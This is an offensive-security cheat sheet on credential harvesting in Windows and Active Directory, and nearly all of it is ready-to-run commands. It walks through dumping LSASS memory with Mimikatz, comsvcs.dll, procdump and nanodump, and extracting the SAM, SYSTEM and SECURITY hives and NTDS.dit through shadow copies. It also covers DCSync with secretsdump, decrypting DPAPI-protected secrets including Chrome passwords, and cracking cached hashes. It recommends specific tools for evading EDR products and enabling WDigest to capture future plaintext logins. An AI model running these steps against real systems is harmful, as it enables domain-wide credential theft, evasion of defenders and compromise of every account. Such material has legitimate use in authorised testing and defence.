Credential Harvesting

Extract credentials from memory, disk, and AD itself. Covers Mimikatz, pypykatz, LSASS dumps, SAM/SYSTEM extraction, DPAPI, LSA secrets, cached domain creds, and DCSync.

Sections Credential Harvesting

You have local admin on a host (or Domain Admin on the domain). Time to harvest every credential you can find. Memory holds plaintext passwords and hashes, the registry stores local account hashes and LSA secrets, DPAPI protects saved credentials, and DCSync lets you pull hashes from the DC itself.

LSASS Memory Extraction

LSASS (Local Security Authority Subsystem Service) holds credentials for all users who have interactively logged on to the machine. Dump it and extract hashes, tickets, and sometimes plaintext passwords.

Mimikatz (On Target)

powershell
# Dump all credentials from LSASS
PS C:\> .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

# Dump NTLM hashes only
PS C:\> .\mimikatz.exe "privilege::debug" "sekurlsa::msv" "exit"

# Dump Kerberos tickets from memory
PS C:\> .\mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"

# Dump wdigest (plaintext passwords, if enabled)
PS C:\> .\mimikatz.exe "privilege::debug" "sekurlsa::wdigest" "exit"

# Dump credential manager
PS C:\> .\mimikatz.exe "privilege::debug" "sekurlsa::credman" "exit"
WDigest plaintext credential caching is disabled by default on Windows 8.1+ and Server 2012 R2+. If you need to enable it for future credential capture, set HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential to 1 and wait for a user to log in.

LSASS Dump to File (Offline Extraction)

If you cannot run Mimikatz on the target, dump the LSASS process to a file and extract credentials offline.

powershell
# Task Manager: Right-click lsass.exe > Create dump file

# comsvcs.dll (built-in, works on most systems)
PS C:\> $lsass = (Get-Process lsass).Id
PS C:\> rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass C:\Temp\lsass.dmp full

# ProcDump (SysInternals - less likely to be flagged)
PS C:\> .\procdump.exe -accepteula -ma lsass.exe C:\Temp\lsass.dmp

# nanodump (creates a MiniDump with direct syscalls, evades most EDR)
PS C:\> .\nanodump.exe -w C:\Temp\lsass.dmp

# PPLdump (if LSASS is running as PPL)
PS C:\> .\PPLdump.exe lsass.exe C:\Temp\lsass.dmp

Offline Extraction with pypykatz

terminal
# Extract credentials from the dump on your attack box
root@localhost:~# pypykatz lsa minidump lsass.dmp

# Output to a file
root@localhost:~# pypykatz lsa minidump lsass.dmp -o creds.txt

# Parse only NTLM hashes
root@localhost:~# pypykatz lsa minidump lsass.dmp | grep -A2 "NT:"

Remote LSASS Dump via NetExec

terminal
# Dump LSASS remotely (requires local admin on target)
root@localhost:~# netexec smb 10.10.11.40 -u Administrator -p 'P@ssw0rd123' -M lsassy

# Dump using procdump method
root@localhost:~# netexec smb 10.10.11.40 -u Administrator -p 'P@ssw0rd123' -M procdump

# Dump using nanodump method
root@localhost:~# netexec smb 10.10.11.40 -u Administrator -p 'P@ssw0rd123' -M nanodump

# Dump using handlekatz
root@localhost:~# netexec smb 10.10.11.40 -u Administrator -p 'P@ssw0rd123' -M handlekatz
LSASS dumps are heavily monitored by EDR. If Defender or CrowdStrike is active, the comsvcs.dll method and standard Mimikatz will likely be caught. Use nanodump, handlekatz, or custom dumpers for evasion.

SAM and SYSTEM Registry Hives

The SAM database stores local account password hashes. The SYSTEM hive contains the boot key needed to decrypt them. You need both.

Extract from Running System

powershell
# reg save (requires admin)
PS C:\> reg save HKLM\SAM C:\Temp\SAM
PS C:\> reg save HKLM\SYSTEM C:\Temp\SYSTEM
PS C:\> reg save HKLM\SECURITY C:\Temp\SECURITY

Extract from Volume Shadow Copies

If you cannot modify the live registry, grab the hives from shadow copies.

powershell
# List shadow copies
PS C:\> vssadmin list shadows

# Copy from a shadow copy
PS C:\> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Temp\SAM
PS C:\> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Temp\SYSTEM
PS C:\> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY C:\Temp\SECURITY

# Create a shadow copy if none exist
PS C:\> wmic shadowcopy call create Volume='C:\'

Dump Hashes Offline

terminal
# Impacket secretsdump (local hive extraction)
root@localhost:~# impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL

# Just SAM hashes
root@localhost:~# impacket-secretsdump -sam SAM -system SYSTEM LOCAL

Remote SAM Dump

terminal
# NetExec - dump SAM remotely
root@localhost:~# netexec smb 10.10.11.40 -u Administrator -p 'P@ssw0rd123' --sam

# Impacket secretsdump - remote
root@localhost:~# impacket-secretsdump corp.local/Administrator:'P@ssw0rd123'@10.10.11.40

# Impacket with hash
root@localhost:~# impacket-secretsdump corp.local/Administrator@10.10.11.40 -hashes :a3f1b9c2d4e5f6a7b8c9d0e1f2a3b4c5

LSA Secrets

LSA secrets store service account passwords, auto-logon credentials, VPN passwords, and other sensitive data in the SECURITY hive.

Extract Remotely

terminal
# Impacket secretsdump extracts LSA secrets automatically
root@localhost:~# impacket-secretsdump corp.local/Administrator:'P@ssw0rd123'@10.10.11.40

# NetExec
root@localhost:~# netexec smb 10.10.11.40 -u Administrator -p 'P@ssw0rd123' --lsa

Extract Locally with Mimikatz

powershell
PS C:\> .\mimikatz.exe "privilege::debug" "lsadump::secrets" "exit"
LSA secrets often contain plaintext passwords for service accounts configured to run with domain credentials. If a SQL Server or IIS app pool runs as a domain user, that password is stored here.

Cached Domain Credentials

Windows caches the last 10 domain logon credentials by default (DCC2/mscache2 format). These work even when the DC is unreachable.

Extract

terminal
# Impacket secretsdump - extracts cached creds from SECURITY hive
root@localhost:~# impacket-secretsdump corp.local/Administrator:'P@ssw0rd123'@10.10.11.40

# NetExec
root@localhost:~# netexec smb 10.10.11.40 -u Administrator -p 'P@ssw0rd123' --lsa
powershell
# Mimikatz
PS C:\> .\mimikatz.exe "privilege::debug" "lsadump::cache" "exit"

Crack DCC2 Hashes

DCC2 hashes are slow to crack. They use 10,240 rounds of PBKDF2.

terminal
# Hashcat mode 2100 (DCC2/mscache2)
root@localhost:~# hashcat -m 2100 dcc2_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# John the Ripper
root@localhost:~# john --format=mscash2 --wordlist=/usr/share/wordlists/rockyou.txt dcc2_hashes.txt
DCC2 hashes cannot be used for pass-the-hash. You must crack them to get the plaintext password. The slow hashing means you will need a good wordlist and rules, or a GPU cluster for larger keyspaces.

DPAPI Credential Extraction

DPAPI (Data Protection API) protects credentials saved in Chrome, Edge, RDP connection manager, Wi-Fi passwords, Windows Credential Manager, and more. The master key is tied to the user’s password.

Mimikatz DPAPI

powershell
# List Credential Manager vaults
PS C:\> .\mimikatz.exe "vault::list" "exit"

# Enumerate credential files
PS C:\> .\mimikatz.exe "dpapi::cred /in:C:\Users\svc_backup\AppData\Local\Microsoft\Credentials\*" "exit"

# Dump DPAPI master keys (needs SYSTEM or domain backup key)
PS C:\> .\mimikatz.exe "privilege::debug" "sekurlsa::dpapi" "exit"

# Decrypt a credential blob with the master key
PS C:\> .\mimikatz.exe "dpapi::cred /in:C:\Users\svc_backup\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D /masterkey:abc123..." "exit"

SharpDPAPI

powershell
# Triage all DPAPI credentials accessible to current user
PS C:\> .\SharpDPAPI.exe triage

# Dump Chrome credentials
PS C:\> .\SharpDPAPI.exe chrome /unprotect

# Dump all credentials using domain backup key (Domain Admin required)
PS C:\> .\SharpDPAPI.exe credentials /mkfile:masterkeys.txt

# Machine credential triage
PS C:\> .\SharpDPAPI.exe machinetriage

Remote DPAPI with Impacket

terminal
# dpapi.py - extract DPAPI secrets remotely
root@localhost:~# impacket-dpapi corp.local/Administrator:'P@ssw0rd123'@10.10.11.40 masterkey
root@localhost:~# impacket-dpapi corp.local/Administrator:'P@ssw0rd123'@10.10.11.40 credential

# DonPAPI - automated DPAPI credential extraction
root@localhost:~# DonPAPI corp.local/Administrator:'P@ssw0rd123'@10.10.11.40

# NetExec DPAPI module
root@localhost:~# netexec smb 10.10.11.40 -u Administrator -p 'P@ssw0rd123' -M dpapi
The DPAPI domain backup key lets you decrypt any user’s DPAPI-protected data across the domain. Extract it with Mimikatz using lsadump::backupkeys /system:dc01.corp.local /export once you have Domain Admin.

NTDS.dit Extraction

NTDS.dit is the AD database. It contains every user’s NTLM hash, Kerberos keys, and password history for the entire domain. Extracting it is the ultimate credential harvest.

DCSync (Remote, No File Copy)

DCSync simulates a domain controller replication request. You need DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights on the domain object (Domain Admins and Enterprise Admins have these by default).

# Dump a specific account
impacket-secretsdump corp.local/Administrator:'P@ssw0rd123'@10.10.11.35 -just-dc-user Administrator

# Dump all accounts
impacket-secretsdump corp.local/Administrator:'P@ssw0rd123'@10.10.11.35 -just-dc

# DCSync with NTLM hash
impacket-secretsdump corp.local/Administrator@10.10.11.35 -hashes :a3f1b9c2d4e5f6a7b8c9d0e1f2a3b4c5 -just-dc

# DCSync with Kerberos ticket
export KRB5CCNAME=/tmp/Administrator.ccache
impacket-secretsdump corp.local/Administrator@dc01.corp.local -k -no-pass -just-dc

# NetExec
netexec smb 10.10.11.35 -u Administrator -p 'P@ssw0rd123' --ntds

NTDS.dit Physical Extraction

If you have admin access on the DC but DCSync is blocked (network restrictions, etc.), grab the file directly.

powershell
# ntdsutil (Microsoft's official tool)
PS C:\> ntdsutil "activate instance ntds" "ifm" "create full C:\Temp\ntds_dump" quit quit

# Volume Shadow Copy method
PS C:\> vssadmin create shadow /for=C:
PS C:\> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\ntds.dit C:\Temp\ntds.dit
PS C:\> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SYSTEM C:\Temp\SYSTEM

# esentutl (copy locked files)
PS C:\> esentutl.exe /y /vss C:\Windows\NTDS\ntds.dit /d C:\Temp\ntds.dit

Extract Hashes from NTDS.dit Offline

terminal
# Impacket secretsdump (offline)
root@localhost:~# impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL

# With password history
root@localhost:~# impacket-secretsdump -ntds ntds.dit -system SYSTEM -history LOCAL

# Output user:hash pairs for pass-the-hash
root@localhost:~# impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL -outputfile ntds_hashes

Windows Credential Manager and Vault

Saved credentials for RDP, SMB, web logins, and scheduled tasks.

powershell
# List saved credentials
PS C:\> cmdkey /list

# PowerShell vault query
PS C:\> [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
PS C:\> (New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll() | ForEach-Object { $_.RetrievePassword(); $_ } | Select-Object UserName, Password, Resource

# Mimikatz vault dump
PS C:\> .\mimikatz.exe "vault::cred /patch" "exit"